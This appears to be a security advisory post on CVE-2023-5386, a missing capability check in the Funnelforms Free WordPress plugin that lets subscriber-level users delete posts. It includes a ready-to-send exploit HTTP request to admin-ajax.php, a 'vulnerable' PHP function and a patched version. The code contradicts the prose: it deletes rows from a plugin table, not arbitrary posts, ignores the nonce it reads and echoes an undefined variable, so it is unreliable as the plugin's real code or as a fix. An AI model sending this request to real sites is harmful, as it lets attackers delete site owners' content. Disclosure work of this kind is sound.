Description: The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_delete_posts function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts, including administrator posts, and posts not related to the Funnelforms Free plugin.
Background
Funnelforms Free is a popular plugin for WordPress that helps users create customizable registration forms, contact forms, and various other types of forms on their websites.
Vulnerability Details
The vulnerability is described in the Common Vulnerabilities and Exposures (CVE) database as CVE-2023-5386. It affects Funnelforms Free plugin versions up to and including 3.4.
The issue lies in a missing capability check in the fnsf_delete_posts function of the plugin. This function is supposed to allow administrators to delete Funnelforms-related posts. However, due to the missing capability check, any authenticated user with subscriber-level permissions and above can also delete arbitrary posts, including administrator posts and posts not related to the Funnelforms Free plugin.
Code Snippet - Vulnerable Function
function fnsf_delete_posts() {
global $wpdb;
$nonce = $_POST['nonce'];
$id = $_POST['id'];
// Missing capability check here!
$wpdb->delete( $wpdb->prefix . 'funnelforms_form_data', array( 'id' => $id ), array( '%d' ) );
echo json_encode( $response );
die();
}
The vulnerability can be exploited by any authenticated user with at least subscriber-level access to a WordPress site using the Funnelforms Free plugin. Attackers can take advantage of this vulnerability to delete important posts, potentially causing significant damage to the targeted site.
Exploit Example
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_[redacted]=testuser%7C[redacted]
action=fnsf_delete_posts&nonce=[redacted]&id=42
This request would delete the post with ID 42, regardless of the user's permissions or if the post is related to Funnelforms Free plugin or not.
Affected Versions
Funnelforms Free plugin versions up to and including version 3.4.
Solution
The vulnerability is fixed in Funnelforms Free version 3.5. All users are urged to update the plugin to this version immediately to address this critical security issue. The plugin can be updated from the WordPress plugin repository.
Patch Example
The vulnerability can also be fixed by modifying the problematic function to include a capability check, as shown below:
function fnsf_delete_posts() {
global $wpdb;
$nonce = $_POST['nonce'];
$id = $_POST['id'];
// Added capability check - begin
if ( ! current_user_can( 'manage_options' ) ) { // Using 'manage_options' as an example
echo json_encode( array( "error" => "Unauthorized access attempt" ) );
die();
}
// Added capability check - end
$wpdb->delete( $wpdb->prefix . 'funnelforms_form_data', array( 'id' => $id ), array( '%d' ) );
echo json_encode( $response );
die();
}
Original References
- CVE-2023-5386
- Funnelforms Free WordPress plugin
- Funnelforms Free 3.5 Changelog
Conclusion
This post describes the unauthorized data modification vulnerability affecting the Funnelforms Free plugin for WordPress. This CVE-2023-5386 vulnerability can lead to the deletion of arbitrary posts by authenticated attackers with subscriber-level permissions and above. The vulnerability has been fixed in Funnelforms Free version 3.5. Users should update the plugin to the latest version immediately to mitigate any potential security risks.
Timeline
Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:14:47 UTC